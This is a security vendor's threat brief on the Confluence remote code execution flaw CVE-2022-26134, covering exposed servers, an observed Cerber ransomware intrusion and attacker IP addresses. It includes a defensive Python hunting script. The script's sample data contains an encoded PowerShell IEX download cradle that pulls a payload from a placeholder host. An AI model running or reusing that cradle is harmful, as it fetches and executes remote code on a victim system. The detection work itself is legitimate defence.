
Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) (Updated)



Executive Summary

On June 2, Volexity reported that over Memorial Day weekend, they identified suspicious activity on two internet-facing servers running Atlassian’s Confluence Server application. After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center. The details were reported to Atlassian on May 31, and Atlassian has since assigned the issue to CVE-2022-26134.

Based on the security advisory issued by Atlassian, it appears that the exploit is indeed an unauthenticated, remote code execution vulnerability. If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems. At the time of publication, the Palo Alto Networks attack surface management solution Cortex Xpanse identified 19,707 instances of Confluence Servers that are potentially affected by this CVE.

A patch resolving the issue has been posted by Atlassian. Palo Alto Networks strongly advises organizations to patch immediately.

Updated June 7 to add additional in-the-wild observations.

Vulnerabilities Discussed: CVE-2022-26134

Table of Contents

Vulnerable Systems
CVE-2022-26134 in the Wild
Cortex Managed Threat Hunting Detections of CVE-2022-26134
Conclusion
Indicators of Compromise

Vulnerable Systems

The Palo Alto Networks attack surface management solution Cortex Xpanse found 19,707 instances of Confluence Servers that are potentially affected by this CVE. The majority of these instances were discovered to reside within the United States, Germany, China and Russia.

Figure 1. On June 3, 2022, Cortex Xpanse found potentially vulnerable Confluence Servers distributed as follows: United States 34.6%, Germany 18.3%, China 9.6%, Russia 5.2%, Ireland (a small share) and the rest of the world 29.2%.

Additionally, the Xpanse research team also found 1,251 end-of-life versions of the Confluence Server exposed on the public internet. Assets running end-of-life software should never be internet-facing. If an asset cannot be updated to secure versions of software, it should be isolated or decommissioned altogether. To learn more about the ubiquitous problem of end-of-life software, please refer to the 2022 Cortex Xpanse Attack Surface Threat Report.

CVE-2022-26134 in the Wild

Thus far, Unit 42 has noted historical scans being performed by the IP addresses publicly shared by Volexity. These scans date back as early as May 26, 2022, and target organizations in various industries.

Additionally, a purported proof of concept (PoC) has reached the public domain, increasing the threat this particular vulnerability poses.

Cortex Managed Threat Hunting Detections of CVE-2022-26134

The Cortex Managed Threat Hunting team has detected several exploitation attempts. Among these attempts, we found one successful exploitation, which resulted in a Cerber ransomware attack.

The ransomware was blocked by the Cortex XDR agent. The Managed Threat Hunting team immediately reported this incident to the customer and continues to monitor our customers using the XQL queries in the following section. Cortex XDR also includes multiple detections for post-exploitation activities.

Below are details of what was seen in the attempt.

Figure 2. Flowchart of the observed successful CVE-2022-26134 exploitation activity.

In this case, the process tomcat.exe spawned multiple reconnaissance commands such as whoami, systeminfo, arp and ipconfig.

On top of that, a Base64-encoded PowerShell command was executed and retrieved a ransomware binary.

Figure 3. Decoded Base64 PowerShell command (the command begins with IEX).

To confirm that the above activity is related to CVE-2022-26134, we looked into the Confluence Apache access logs (atlassian-confluence.log) and found the PowerShell execution.

Figure 4. The atlassian-confluence.log file, showing the PowerShell execution (highlighted in green).
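The process-tree behaviour described above (tomcat.exe spawning reconnaissance commands, then PowerShell with a Base64-encoded command that begins with IEX) can be expressed as hunting logic over endpoint process events. The following Python is an added example, not Unit 42's XQL queries or Cortex XDR's detections; the event fields, the parent-process name it keys on, the -EncodedCommand abbreviations it recognises, and the sample events (including the placeholder host placeholder.invalid) are constructed assumptions.

```python
"""Added example: hunting for a web-server process spawning recon commands
or an encoded PowerShell download cradle, over constructed process events."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumption: the Confluence web server runs as tomcat.exe, as observed above.
WEB_SERVER_PARENTS = {"tomcat"}
# Reconnaissance commands named in the observed chain.
RECON_COMMANDS = {"whoami", "systeminfo", "arp", "ipconfig"}
# -EncodedCommand and the unambiguous abbreviations PowerShell accepts for it
# (assumed list; extend as needed). The payload is Base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


@dataclass
class ProcessEvent:
    parent: str   # image name or path of the parent process
    image: str    # image name or path of the spawned process
    cmdline: str  # full command line of the spawned process


@dataclass
class Finding:
    rule: str
    event: ProcessEvent
    detail: str = ""


def _basename(token: str) -> str:
    """Lower-cased file name without directory or a trailing .exe."""
    name = token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden in a -EncodedCommand argument, or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command


def inspect_event(event: ProcessEvent) -> List[Finding]:
    """Apply both rules to one event; only children of the web server matter."""
    findings: List[Finding] = []
    if _basename(event.parent) not in WEB_SERVER_PARENTS:
        return findings
    child = _basename(event.image)
    # Look at every token so "cmd.exe /c whoami" is caught as well as whoami.exe.
    invoked = {child} | {_basename(t) for t in event.cmdline.split()}
    recon = invoked & RECON_COMMANDS
    if recon:
        findings.append(Finding("web_server_spawned_recon", event, ", ".join(sorted(recon))))
    if child in {"powershell", "pwsh"}:
        decoded = decode_encoded_command(event.cmdline)
        if decoded is not None:
            rule = "web_server_spawned_encoded_powershell"
            if re.search(r"(?i)\bIEX\b|Invoke-Expression", decoded):
                rule = "web_server_spawned_iex_download_cradle"
            findings.append(Finding(rule, event, decoded.strip()))
    return findings


def hunt(events: List[ProcessEvent]) -> List[Finding]:
    """Run the rules over a list of events and collect every finding."""
    return [f for ev in events for f in inspect_event(ev)]


# Constructed sample payload: an IEX download cradle pointing at a placeholder host.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/payload.ps1')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

# Constructed sample events modelled on the chain described above.
SAMPLE_EVENTS = [
    ProcessEvent("tomcat.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("tomcat.exe", "systeminfo.exe", "systeminfo"),
    ProcessEvent("tomcat.exe", "powershell.exe", f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"),
    ProcessEvent("explorer.exe", "powershell.exe", f"powershell.exe -enc {SAMPLE_B64}"),  # not a web-server child
    ProcessEvent("tomcat.exe", "java.exe", "java -jar helper.jar"),  # ordinary child process
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"{finding.rule}: {finding.event.image} -> {finding.detail}")
```

The decode step matters because the encoded form never contains the string IEX; a rule that only pattern-matches the raw command line misses the cradle shown in Figure 3. The explorer.exe event is deliberately left unflagged here to keep the rule scoped to the web-server process tree; a broader rule would treat any encoded PowerShell as worth a look.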

Hunting Queries

The Cortex Managed Threat Hunting team continues to track any attempts to exploit CVE-2022-26134 across our customers, using Cortex XDR and the XQL queries below.

Conclusion

Palo Alto Networks provides protection against the exploitation of this vulnerability in the following ways:

  • Next-Generation Firewalls (PA-Series, VM-Series and CN-Series) or Prisma Access with a Threat Prevention security subscription can automatically block sessions related to this vulnerability using Threat ID 92632 (Application and Threat content update 8577).
  • Cortex XDR for Linux helps block CVE-2022-26134 attacks out of the box. Cortex XDR helps protect against post-exploitation activities on all OSes.
  • Prisma Cloud Web Application and API Security (WAAS) customers can use the OGNL Evaluation Injection custom rule in order to detect and block exploitation attempts.

Additionally, Xpanse has the ability to identify and detect Atlassian Confluence Servers that may be a part of your attack surface or the attack surface of third-party partners connected to your organization. Xpanse is even able to classify those servers which have not been upgraded to the most recent version. These abilities will be updated to detect additional instances or versions that are insecure against this CVE.

Existing Xpanse customers can log into Expander and identify their enumerated Atlassian Confluence devices by filtering by “Atlassian Confluence Server” in the Services tab.

As further information emerges or additional detections and protections are put into place, Palo Alto Networks will update this publication accordingly.

Indicators of Compromise

During the hunting process, we encountered exploitation attempts that originated from the following IP addresses:

IoC Type    IoC
IPv4        172.104.31.117
IPv4        191.37.248.120
IPv4        84.17.48.94
IPv4        193.106.191.71
IPv4        54.88.149.100
IPv4        18.216.140.250
IPv4        18.221.234.103
IPv4        89.187.170.129
IPv4        2.56.11.65
IPv4        87.249.135.167
IPv4        192.99.152.200
IPv4        31.13.191.157
IPv4        27.1.1.34
IPv4        167.99.57.116

Updated June 13, 2022, at 5:30 a.m. PT.